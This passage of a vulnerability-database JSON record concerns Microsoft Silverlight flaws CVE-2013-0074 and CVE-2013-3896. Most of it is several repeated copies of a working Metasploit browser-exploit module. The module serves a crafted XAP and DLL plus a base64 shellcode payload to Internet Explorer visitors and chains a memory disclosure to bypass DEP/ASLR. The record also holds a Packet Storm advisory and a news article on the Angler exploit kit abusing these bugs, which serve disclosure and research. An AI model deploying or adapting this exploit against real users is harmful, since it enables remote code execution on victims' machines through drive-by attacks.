setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41702/"}], "zdt": [{"lastseen": "2018-03-13T01:18:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This Metasploit module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1 on both x32 and x64 architectures.", "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "1337DAY-ID-21573", "href": "https://0day.today/exploit/description/21573", "type": "zdt", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21573"}, {"lastseen": "2018-04-10T05:36:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "https://0day.today/exploit/description/27390", "id": "1337DAY-ID-27390", "type": "zdt", "title": "Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'PACKETSTORM', '123731' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :silverlight => \"true\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86/x64', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n my_payload = get_payload(cli, target_info)\r\n \r\n # Align to 4 bytes the x86 payload\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n \r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n \r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/124182/Microsoft-Internet-Explorer-COALineDashStyleArray-Unsafe-Memory-Access.html", "id": "PACKETSTORM:124182", "type": "packetstorm", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \nMANIFEST = <<-EOS \n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\"> \n<Deployment.Parts> \n<AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" /> \n</Deployment.Parts> \n</Deployment> \nEOS \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\", \n'Description' => %q{ \nThis module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on \nthe Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an \nunsafe manner. Since it is accessible for untrusted code (user controlled) it's possible \nto dereference arbitrary memory which easily leverages to arbitrary code execution. In order \nto bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class \nfrom System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP \nSP3 / Windows 7 SP1 on both x32 and x64 architectures. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'James Forshaw', # RCE Vulnerability discovery \n'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-0074' ], \n[ 'CVE', '2013-3896' ], \n[ 'OSVDB', '91147' ], \n[ 'OSVDB', '98223' ], \n[ 'BID', '58327' ], \n[ 'BID', '62793' ], \n[ 'MSB', 'MS13-022' ], \n[ 'MSB', 'MS13-087' ], \n[ 'URL', 'http://packetstormsecurity.com/files/123731/' ] \n], \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'EXITFUNC' => 'thread' \n}, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X86_64], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => Msf::HttpClients::IE \n}, \n'Targets' => \n[ \n[ 'Windows x86', \n{ \n'arch' => ARCH_X86 \n} \n], \n[ 'Windows x64', \n{ \n'arch' => ARCH_X86_64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 12 2013\", \n'DefaultTarget' => 0)) \n \nend \n \ndef setup \n@xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\" \n@dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\" \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read } \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read } \n@xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name) \nsuper \nend \n \ndef exploit_template(cli, target_info) \n \nmy_payload = get_payload(cli, target_info) \n \n# Align to 4 bytes the x86 payload \nif target_info[:arch] == ARCH_X86 \nwhile my_payload.length % 4 != 0 \nmy_payload = \"\\x90\" + my_payload \nend \nend \n \nmy_payload = Rex::Text.encode_base64(my_payload) \n \nhtml_template = <<-EOF \n<html> \n<!-- saved from url=(0014)about:internet --> \n<head> \n<title>Silverlight Application</title> \n<style type=\"text/css\"> \nhtml, body { height: 100%; overflow: auto; } \nbody { padding: 0; margin: 0; } \n#form1 { height: 99%; } \n#silverlightControlHost { text-align:center; } \n</style> \n</head> \n<body> \n<form id=\"form1\" runat=\"server\" > \n<div id=\"silverlightControlHost\"> \n<object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\"> \n<param name=\"source\" value=\"<%= @xap_name %>\"/> \n<param name=\"background\" value=\"white\" /> \n<param name=\"InitParams\" value=\"payload=<%= my_payload %>\" /> \n</object> \n</div> \n</form> \n</body> \n</html> \nEOF \n \nreturn html_template, binding() \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"request: #{request.uri}\") \nif request.uri =~ /#{@xap_name}$/ \nprint_status(\"Sending XAP...\") \nsend_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /#{@dll_name}$/ \nprint_status(\"Sending DLL...\") \nsend_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /AppManifest.xaml$/ \nprint_status(\"Sending XAML...\") \nsend_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelse \nprint_status(\"Sending HTML...\") \nsend_exploit_html(cli, exploit_template(cli, target_info)) \nend \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124182/ms13_022_silverlight_script_object.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Memory content leakage.", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:VULN:13337", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13337", "title": "Microsoft Silverlight information leakage", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n+------------------------------------------------------------------------------+\r\n| Packet Storm Advisory 2013-1022-1 |\r\n| http://packetstormsecurity.com/ |\r\n+------------------------------------------------------------------------------+\r\n| Title: Microsoft Silverlight Invalid Typecast / Memory Disclosure |\r\n+--------------------+---------------------------------------------------------+\r\n| Release Date | 2013/10/22 |\r\n| Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) |\r\n| Researcher | Vitaliy Toropov |\r\n+--------------------+---------------------------------------------------------+\r\n| System Affected | Microsoft Silverlight |\r\n| Versions Affected | Prior to 5.1.20125.0 (MS13-022) |\r\n| | Prior to 5.1.20913.0 (MS13-087) |\r\n| Related Advisory | MS13-022 / MS13-087 |\r\n| Related CVE Number | CVE-2013-0074 / CVE-2013-3896 |\r\n| Vendor Patched | 2013/03/12 / 2013/10/08 |\r\n| Classification | 1-day |\r\n+--------------------+---------------------------------------------------------+\r\n\r\n+----------+\r\n| OVERVIEW |\r\n+----------+\r\n\r\nThe release of this advisory provides exploitation details in relation to \r\nknown patched vulnerabilities in Microsoft Silverlight. These details were \r\nobtained through the Packet Storm Bug Bounty program and are being released \r\nto the community.\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------+\r\n| DETAILS |\r\n+---------+\r\n\r\nA memory disclosure vulnerability exists in the public WriteableBitmap class\r\nfrom System.Windows.dll. This class allows reading of image pixels from the \r\nuser-defined data stream via the public SetSource() method.\r\n\r\nBitmapSource.ReadStream() allocates and returns byte array and a count of array\r\nitems as out parameters. These returned values are taken from the input stream\r\nand they can be fully controlled by the untrusted code. When returned "count" \r\nis greater than "array.Length", then data outside the "array" are used as input \r\nstream data by the native BitmapSource_SetSource() from agcore.dll. Later all \r\ndata can be viewed via the public WriteableBitmap.Pixels[] property.\r\n\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+------------------+\r\n| PROOF OF CONCEPT |\r\n+------------------+\r\n\r\nThe full exploit code demonstrating code execution is available here:\r\nhttp://packetstormsecurity.com/files/123731/\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------------+\r\n| RELATED LINKS |\r\n+---------------+\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-022\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-087\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n\r\n+----------------+\r\n| SHAMELESS PLUG |\r\n+----------------+\r\n\r\nThe Packet Storm Bug Bounty program gives researchers the ability to profit \r\nfrom their discoveries. You can get paid thousands of dollars for one day \r\nand zero day exploits. Get involved by contacting us at \r\ngetpaid@packetstormsecurity.com or visit the bug bounty page at: \r\n\r\nhttp://packetstormsecurity.com/bugbounty/\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJnHfEACgkQrM7A8W0gTbFKPACdGSp3GhRyvUjEzrNnlNejkGt+\r\npzQAoIeywymRBuPYbO9+OVGT59miZKuC\r\n=1UST\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:DOC:29990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29990", "title": "[PSA-2013-1022-1] Microsoft Silverlight Invalid Typecast / Memory Disclosure", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-pcFP_zbLVtk/U3yhWayfDAI/AAAAAAAAbvc/xfGpaMN_5f0/s1600/Netfli-Microsoft-Silverlight-Anglr-Exploit-Kit.jpg>)\n\nNetflix, the world\u2019s largest Internet Video Subscription service with more than 35.7 million customers in U.S alone, that runs on the [Microsoft](<https://thehackernews.com/search/label/Microsoft>) Silverlight platform, has now become a popular target for cybercriminals, as public awareness of Java and Flash flaws is increasing.\n\n \n\n\nSilverlight is a Microsoft\u2019s plug-in for streaming media on browsers, similar to [Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash>), that handles multimedia contents on Microsoft Windows and Mac OS X Web Browsers, and is popularly known for being used in Netflix\u2019s streaming video service.\n\n \n\n\nBut, Netflix isn't the only service that works on Silverlight, many other multimedia services supports Silverlight.\n\n \n\n\nMalware and Exploit Kit developers are targeting Silverlight users as they aren't aware of the increasing proliferation of malware for the platform. Silverlight vulnerabilities are mostly exploited using drive-by download attacks to compromise victim\u2019s computers with malware, especially through malicious ads.\n\n \n\n\nA recent _Angler Exploit Campaign_ has been [spotted](<https://blogs.cisco.com/security/angling-for-silverlight-exploits>) by the Cisco researcher spiked since April 23, targeting Microsoft\u2019s Silverlight by imposing the exploits on the infected systems. The Exploit Kit in this campaign also hosts exploits for Flash and Java, but it doesn't trigger them, which at a time was one of the widely targeted platform by the exploit kits developers.\n\n \n\n\n\"_Exploit kit owners are adding Silverlight to their update releases, and since 23 April we have observed substantial traffic - often from malvertising - being driven to Angler instances partially using Silverlight exploits_,\" said Gundert, the lead threat researcher at Cisco.\n\n \n\n\nThe cyber criminals are infiltrating the Advertising Networks with malvertising to redirect victims to the hundreds of malicious websites hosting the Angler Exploit Kit, where the actual attack comes into play by silently launching Silverlight exploits against the infected system.\n\n[](<https://3.bp.blogspot.com/-dMh-lqkMM54/U3yiBjM5mVI/AAAAAAAAbvk/XBrCwCDr1Ts/s1600/Ad-Exchange-flow.png>)\n\nTill now, The [Exploit Kit](<https://thehackernews.com/search/label/exploit%20kit>) (EK) developers were targeting the [vulnerabilities](<https://thehackernews.com/search/label/Vulnerability>) in Adobe Flash and Oracle Java, but as the public awareness and pathing efforts of both the two firms has increased, the malware developers have switched to the Microsoft\u2019s Silverlight.\n\n \n\n\n\u201c_Java and Flash have been heavily exploited over the years, and vendors are getting good at writing engines that detect vulnerabilities in those libraries_,\u201d said the Cisco researcher Craig Williams. \u201c_Silverlight has not been exploited much. There are some limited CVEs, but few are widespread. What we may be seeing here is a tipping point where Java exploits are being detected and what other formats can hackers take advantage of_.\u201d\n\n[](<https://1.bp.blogspot.com/-KuJsqyynLnI/U3yiIwSapdI/AAAAAAAAbvs/hajh-Ij4eNw/s1600/Angler-Attack-flow.png>)\n\nLevi Gundert , Technical lead at Cisco Threat Research observed that the Angler campaign exploits two known Silverlight vulnerabilities i.e. \n\n * CVE-2013-0074 - which gives attackers the ability to remotely execute malicious code\n * CVE-2013-3896 - it allows to bypass Data Execution Prevention (DEP), a security mitigation added to most Microsoft applications.\n\n> \"_We should expect these existing Silverlight exploits to proliferate through other exploit pack families in the near future as threat actors copy code from each other and release updates_,\" Gundert wrote.\n\n> \"_Silverlight exploits are also ideal because Silverlight continues to gain rich Internet application market share, perhaps surpassing Java, and Microsoft\u2019s life cycle schedule suggests Silverlight 5 will be supported through October, 2021_.\"\n\nThe security firm didn't expose the names of compromised websites serving the exploit kit. The Angler exploit kit managers were expected to be of the same group that was behind the infamous [Reveton ransomware](<https://thehackernews.com/2013/02/group-behind-largest-ransomware.html>).\n", "modified": "2014-05-21T12:59:24", "published": "2014-05-21T01:59:00", "id": "THN:BC65D2F30C85103414F6BD1EC204BB05", "href": "https://thehackernews.com/2014/05/netflix-users-targeted-by-microsoft.html", "type": "thn", "title": "Netflix Users Targeted by Microsoft Silverlight Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-11-28T18:23:13", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily 